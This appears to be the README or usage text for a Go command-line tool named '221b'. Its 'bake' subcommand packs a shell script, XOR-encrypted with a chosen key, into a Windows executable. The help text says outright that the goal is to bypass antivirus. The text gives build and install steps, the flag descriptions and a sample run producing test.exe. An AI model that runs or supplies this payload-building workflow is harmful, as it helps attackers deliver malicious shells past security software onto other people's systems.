go build -o 221b ./main.go
sudo mv 221b /usr/local/bin/
221b bake -k <key> -s <shell>
221b help bake
Build a windows payload with the given shell encrypted in it to bypass AV
Usage:
221b bake [flags]
Flags:
-h, --help help for bake
-k, --key string key to use for the xor
-s, --shellpath string Path to the shell scrypt
Global Flags:
--debug activate debug mode
221b bake -k shflfhje -s test.sh
go: added golang.org/x/sys v0.10.0
[+] file compiled to ./test.exe